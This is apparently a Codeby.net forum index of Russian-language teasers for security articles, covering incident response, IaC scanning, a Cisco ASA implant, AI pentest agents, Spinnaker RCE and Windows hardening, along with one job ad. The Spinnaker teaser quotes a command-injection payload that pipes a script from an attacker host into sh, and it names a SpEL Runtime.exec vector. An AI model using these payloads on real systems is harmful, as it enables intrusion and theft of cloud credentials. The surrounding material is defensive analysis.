Форум информационной безопасности - Codeby.net
Статья Реагирование на инциденты информационной безопасности: от алерта до изоляции за 30 минут
Понедельник 9:15 — mass file encryption. Через 12 минут ещё три хоста. Атакующие сидели неделю, данные уже ушли. Разница между «под контролем» и «на DLS» — первые 30 минут триажа.75% вторжений используют валидные credentials, медианный dwell time — 11 дней, 57% организаций узнают от внешней стороны. Decision tree триажа: единичный алерт или кластер → маппинг TTPs на MITRE ATT&CK → критичность актива → lateral movement. Lateral movement — проверяйте первым, а не последним.
Три параллельных потока для определения масштаба: EDR-телеметрия, SIEM за 14 дней назад, NetFlow на beaconing. Memory dump — до любых действий. Chain of custody — SHA256 + UTC + ФИО аналитика. Sigma-правило на mass share access и минимальный detection-чеклист для SOC.
Главный вывод: decision matrix «кто нажимает isolate без согласования» важнее любого playbook.Статья Безопасность Infrastructure as Code: от мисконфигурации в Terraform до detection-правила в SIEM
Capital One, LA Times, Twilio — три инцидента, три мисконфигурации, которые ловятся checkov -d . за секунды. Четыре года IaC-сканирования в production: ни одна найденная проблема не добралась до прода.Пять категорий: публичный доступ (T1580), wildcard IAM (T1078.004), отсутствие шифрования (T1552.001), пробелы в логировании (T1562.008), избыточный сетевой доступ. Две стратегии: HCL-скан на этапе PR за секунды, план-скан перед apply — ловит динамические выражения и переменные. Checkov, Trivy, KICS, Terrascan — выбор по стеку.
Главная слепая зона: configuration drift. Разработчик добавил 0.0.0.0/0 через консоль — сканер молчит. CSPM + SIEM-правило на AuthorizeSecurityGroupIngress не от CI/CD role — второй эшелон. Suppression rate как метрика: 200 skip-аннотаций в репо — сканер стал формальностью.
Detection-чеклист CloudTrail событий с MITRE ATT&CK для SOC.Статья FIRESTARTER на Cisco ASA: как бэкдор переживает патчи
6 месяцев dwell time на пропатченном Cisco Firepower: патч закрыл дверь, а FIRESTARTER уже внутри. Graceful shutdown — момент, когда имплант прописывает автозапуск в CSP_MOUNT_LIST.UAT-4356 (ArcaneDoor): CVE-2025-20362 (PR:N, автоматизируема) + CVE-2025-20333 (CVSS 9.9, RCE) через WebVPN. FIRESTARTER живёт в LINA-процессе — show version, show running-config, syslog молчат. Magic packet через WebVPN активирует без эксплуатации CVE. Полностью пропатченное устройство доступно бессрочно.
CSP_MOUNT_LIST модифицируется при SIGTERM → boot восстанавливает её до чистого состояния. Firmware upgrade = graceful shutdown = имплант выживает. Удаляет только hard power cycle или полный reimage. IBM X-Force: среднее время устранения CVE — 29 месяцев. CISA дала один день.
CLI-команда для проверки + YARA IOC + decision tree при подозрении на компрометацию.Статья AI-агенты в пентесте: от 91% на CTF до провала в Active Directory
PentestGPT v2: 91% на веб-задачах и 4/5 хостов в GOAD — но агент без throttling'а засвечивается быстрее шумного скрипт-кидди. Два типа отказов, которые не лечатся заменой модели.28 LLM-агентов проанализированы — и у всех один разлом. Type A (нет инструмента, плохой промпт) лечится инженерией. Type B (преждевременная фиксация на ветке, бесконечная разведка, забывание контекста на шаге 7) — нет. GPT-5 как backbone сжимает разрыв между агентами вдвое: архитектурные надстройки деградируют по мере прогресса моделей.
TDA — difficulty-aware planning — снижает долю Type B с 58% до 27%. State management удваивает результаты hackingBuddyGPT на privesc без замены модели. Sigma-набор на T1046 ловит агента раньше, чем он добирается до эксплуатации.
Decision tree: когда AI-агент даёт ROI, а когда — шум в логах SOC.Статья Символьное исполнение для поиска уязвимостей: angr, Manticore и Triton на практике
angr, Manticore, Triton: «wyvern» CSAW CTF 500 — 15 минут скриптом вместо часов в Ghidra. Честный разбор трёх символьных движков с decision tree и кодом.Символьное исполнение заменяет конкретный ввод символическими переменными, накапливает constraints на каждом ветвлении и скармливает Z3-солверу — тот находит ввод математически, без перебора. angr — CTF rev/pwn и AEG, еженедельные коммиты. Manticore — разработка остановлена, EVM-наработки ещё ценны. Triton — DSE поверх конкретного trace, незаменим для деобфускации VMProtect и Themida.
Path explosion убивает анализ на реальных бинарях: SHA-256 на критическом пути — стоп-сигнал. Concolic через angr+Unicorn: распаковка конкретно, символьный анализ включается после. Шесть строк кода на fauxware, strcpy_find за 2 секунды, автоматическая AEG.
Fuzzer за час находит то, что символьный движок ищет сутки — но concolic генерирует ввод через magic bytes.Статья CVE-2026-32604 и CVE-2026-32613: RCE в Spinnaker — от low-priv аутентификации до shell на clouddriver и Echo
CVE-2026-32604 и CVE-2026-32613 в Spinnaker: CVSS 9.9, любая аутентифицированная учётка — shell на clouddriver с production AWS credentials. Один PUT /artifacts/fetch.branch конкатенируется в sh -c без санитизации: «main; curl attacker/sh.sh|sh;» — и clouddriver выполняет произвольный скрипт. GET /artifacts/credentials отдаёт список аккаунтов любому пользователю без проверки ролей. Echo использует SpEL без sandbox — T(java.lang.Runtime).getRuntime().exec() работает напрямую, Orca прикрыли whitelist'ом, Echo — нет.
Post-exploitation: credentials в YAML-конфиге plaintext, IAM-роль через instance metadata, ServiceAccount token → K8s API, trusted mesh к Orca/Fiat/Echo без аутентификации. Два хопа, ноль дополнительных кредов — от low-priv учётки до production-инфраструктуры.
Decision table двух векторов и Falco-правило для детекта shell-spawn из JVM.Вакансия Ведущий специалист по Информационной Безопасности (PCI DSS & Fintech Compliance)
Ведущий специалист по ИБ (PCI DSS & Fintech Compliance) — HaaS, Москва, офис, 300 000–350 000 руб.Ищем эксперта, который возьмёт на себя полный цикл PCI DSS: от подготовки документации и внутренних аудитов до взаимодействия с аудиторами и прохождения ежегодной сертификации. В зоне ответственности — консультирование команд разработки и продукта, участие в запуске новых продуктов, актуализация политик ИБ.
Требуется практический опыт с PCI DSS, знание 152-ФЗ и 821-П. Плюсом: опыт с HSM Thales 10K, понимание архитектуры платёжных систем, финтех или банковский бэкграунд. Официальное трудоустройство по ТК РФ, белая зарплата, 5/2.
CV: @haas_maru в Telegram.Статья Network Policies в Kubernetes: изоляция подов на практике
По умолчанию каждый под в вашем кластере видит все остальные - flat network без границ. Один скомпрометированный контейнер открывает атакующему полный доступ к production-сервисам, базам данных и внутренним API. Именно так выглядит lateral movement в реальных инцидентах.
В этой статье разберём, как Network Policies превращают хаотичную сеть кластера в управляемые сегменты: синтаксис и логику политик, почему стандартный K8s API - это только половина решения, и чем Calico с Cilium закрывают то, что ванильный Kubernetes не умеет. Практический разбор: GlobalNetworkPolicy и DNS-based rules в Calico, L7-фильтрация HTTP-трафика и identity-based security в Cilium, паттерны default deny и микросегментации - с реальными YAML-манифестами и командами для проверки.Статья Харденинг Windows 10/11 после окончания поддержки: чеклист для пентестера и администратора
120 машин на Windows 10 22H2 после EOL — дефолтные GPO, открытый SMBv1, LSASS без RunAsPPL. Mimikatz снимал хеши без сопротивления. Три пентеста, один чеклист.После 14 октября 2025 каждая новая CVE в ядре Windows 10 — перманентный 0-day. Diff между патчем Windows 11 и непропатченной Win10 публикуется открыто — готовый Exploitation for Privilege Escalation T1068. Defender обновляет сигнатуры до 2028, но дыру в win32k.sys антивирусная сигнатура не заткнёт.
Три GPO за 15 минут закрывают 70% типового внутреннего пентеста: RunAsPPL + WDigest off (T1003.001), SMBv1 off (relay, legacy RCE), LLMNR/NBT-NS off (Responder за минуты). Таблица приоритетов из 8 мер: эффект к сложности, закрываемый ATT&CK-вектор для каждой.
HardeningKitty + PingCastle для автоматического аудита по CIS Benchmark v3.0.0.Статья Smoke тестирование и качество обратной связи: от прогона до действия в CI/CD
Smoke-тест поймал сломанный платёжный эндпоинт — но gate пропустил сборку по правилу «pass if >90%». В субботу клиенты не смогли оплатить заказ. Проблема не в тестах, а в feedback loop.Smoke без обратной связи — дымовой датчик с отключённой сиреной. allow_failure: true в GitLab CI превращает gate в декорацию. Уведомление в общий канал из 40 человек — никто не реагирует. Flaky rate выше 2% — команда перестаёт верить gate и начинает его обходить.
Четыре звена feedback loop: детекция → адресная нотификация автору коммита → диагностика с контекстом (Expected 200, got 503) → fix и перезапуск. Pytest + GitLab CI с allow_failure: false, маркеры critical/advisory для двух уровней gate, метрики: pass rate, MTTF, flaky rate, suite duration.
Проверка: уроните smoke намеренно и засеките, когда разработчик узнает.